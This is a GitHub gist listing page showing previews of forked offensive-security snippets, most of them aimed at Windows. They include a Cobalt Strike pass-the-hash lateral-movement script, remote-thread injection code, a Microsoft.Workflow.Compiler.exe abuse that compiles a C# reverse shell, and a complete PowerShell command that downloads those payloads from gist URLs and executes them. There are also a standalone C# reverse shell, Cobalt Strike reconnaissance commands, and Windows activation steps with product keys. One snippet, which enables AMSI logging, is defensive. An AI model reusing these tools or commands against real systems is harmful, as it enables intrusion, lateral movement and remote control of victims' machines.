Skip to content

Instantly share code, notes, and snippets.

Dave Hardy davehardy20

  • UK
Block or report user

Report or block davehardy20

Hide content and notifications from this user.

Learn more about blocking users

Contact Support about this user’s behavior.

Learn more about reporting abuse

Report abuse
View GitHub Profile
@davehardy20
davehardy20 / EnableAMSILogging.ps1
Created Nov 15, 2018 — forked from mattifestation/EnableAMSILogging.ps1
Enables AMSI logging to the AMSI/Operational event log
View EnableAMSILogging.ps1
# Run this elevated, reboot, boom.
# Feel free to name this whatever you want
$AutoLoggerName = 'MyAMSILogger'
$AutoLoggerGuid = "{$((New-Guid).Guid)}"
New-AutologgerConfig -Name $AutoLoggerName -Guid $AutoLoggerGuid -Start Enabled
Add-EtwTraceProvider -AutologgerName $AutoLoggerName -Guid '{2A576B87-09A7-520E-C21A-4942F0271D67}' -Level 0xff -MatchAnyKeyword 0x80000000000001 -Property 0x41
@davehardy20
davehardy20 / smbexec_psh.cna
Created Oct 24, 2018 — forked from realoriginal/smbexec_psh.cna
Cheap solution to problems with make_token, psexec/lateral movement/sekurlsa::pth for cross-domain PTH in the same forest.
View smbexec_psh.cna
# Lateral Movement using Invoke-TheHash toolkit
# Written by Mumbai
# git clone https://github.com/Kevin-Robertson/Invoke-TheHash
# mv Invoke-TheHash/Invoke-TheHash.ps1 Invoke-TheHash.ps1
# cat Invoke-TheHash/Invoke-*.ps1 >> Invoke-TheHash.ps1
beacon_command_register("smbexec_psh", "Lateral movement using Invoke-TheHash toolkit",
"Synopsis: smbexec_psh [x86/x64] [target] [listener] [username] [domain] [ntlm]\n\n",
"Run a payload on a target via Invoke-TheHash SMBExec");
@davehardy20
davehardy20 / windows10activation
Created Oct 24, 2018 — forked from realoriginal/windows10activation
Activate Windows 10 without Any Activator
View windows10activation
1. Open CMD as Administrator
2. Paste the following commands into the Cmd: One by one, follow the order.
cscript slmgr.vbs /ipk "SERIAL NUMBER HERE"
Replace SERIAL NUMBER HER with any of these, according your Windows 10 installation type.
Home/Core TX9XD-98N7V-6WMQ6-BX7FG-H8Q99
Home/Core (Country Specific) PVMJN-6DFY6-9CCP6-7BKTT-D3WVR
Home/Core (Single Language) 7HNRX-D7KGG-3K4RQ-4WPJ4-YTDFH
View sedebug_rtlcreatethread.c
/*! @brief https://github.com/rapid7/meterpreter/blob/master/source/common/arch/win/remote_thread.c */
#include <windows.h>
#include <stdio.h>
typedef DWORD(WINAPI *prototype_RtlCreateUserThread)(
HANDLE ProcessHandle,
PSECURITY_DESCRIPTOR SecurityDescriptor,
BOOL CreateSuspended,
ULONG StackZeroBits,
PULONG StackReserved,
@davehardy20
davehardy20 / REV.txt
Created Oct 22, 2018 — forked from BankSecurity/REV.txt
Microsoft.Workflow.Compiler.exe Abuse for open a live C# Reverse Shell
View REV.txt
<?xml version="1.0" encoding="utf-8"?>
<CompilerInput xmlns:i="http://www.w3.org/2001/XMLSchema-instance" xmlns="http://schemas.datacontract.org/2004/07/Microsoft.Workflow.Compiler">
<files xmlns:d2p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays">
<d2p1:string>Rev.Shell</d2p1:string>
</files>
<parameters xmlns:d2p1="http://schemas.datacontract.org/2004/07/System.Workflow.ComponentModel.Compiler">
<assemblyNames xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<compilerOptions i:nil="true" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
<coreAssemblyFileName xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler"></coreAssemblyFileName>
<embeddedResources xmlns:d3p1="http://schemas.microsoft.com/2003/10/Serialization/Arrays" xmlns="http://schemas.datacontract.org/2004/07/System.CodeDom.Compiler" />
@davehardy20
davehardy20 / Rev.Shell
Created Oct 22, 2018 — forked from BankSecurity/Rev.Shell
Abuse Microsoft.Workflow.Compiler.exe for compile C# Reverse Shell
View Rev.Shell
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Net;
using System.Net.Sockets;
using System.Workflow.Activities;
public class Program : SequentialWorkflowActivity
@davehardy20
davehardy20 / PowerShell_Command.txt
Created Oct 22, 2018 — forked from BankSecurity/PowerShell_Command.txt
Reverse Shell Powershell command Abusing Microsoft.Workflow.Compiler.exe
View PowerShell_Command.txt
64bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsoft.Net\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe REV.txt Rev.Shell
32bit:
powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/812060a13e57c815abe21ef04857b066/raw/81cd8d4b15925735ea32dff1ce5967ec42618edc/REV.txt', '.\REV.txt') }" && powershell -command "& { (New-Object Net.WebClient).DownloadFile('https://gist.githubusercontent.com/BankSecurity/f646cb07f2708b2b3eabea21e05a2639/raw/4137019e70ab93c1f993ce16ecc7d7d07aa2463f/Rev.Shell', '.\Rev.Shell') }" && C:\Windows\Microsof
@davehardy20
davehardy20 / Simple_Rev_Shell.cs
Created Oct 22, 2018 — forked from BankSecurity/Simple_Rev_Shell.cs
C# Simple Reverse Shell Code
View Simple_Rev_Shell.cs
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
View Build_In_Memory_CSharp_Project.txt
After a little more research, 'In Memory' notion was a little exaggerated (hence the quotes). However, we'll call it 'In Memory Inspired' ;-)
These examples are PowerShell alternatives to MSBuild.exe/CSC.exe for building (and launching) C# programs.
Basic gist after running PS script statements:
- Loads C# project from file or web URL
- Create various tmp files
- Compile with csc.exe [e.g. "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\subadmin\AppData\Local\Temp\lz2er5kc.cmdline"]
- Comvert to COFF [e.g. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\subadmin\AppData\Local\Temp\RES11D5.tmp" "c:\Users\subadmin\AppData\Local\Temp\CSCDECDA670512E403CA28C9512DAE1AB3.TMP"]
@davehardy20
davehardy20 / cobaltstrike_sa.txt
Created Sep 29, 2018 — forked from HarmJ0y/cobaltstrike_sa.txt
Cobalt Strike Situational Awareness Commands
View cobaltstrike_sa.txt
Windows version:
reg query x64 HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion
Users who have authed to the system:
ls C:\Users\
System env variables:
reg query x64 HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Environment
Saved outbound RDP connections:
You can’t perform that action at this time.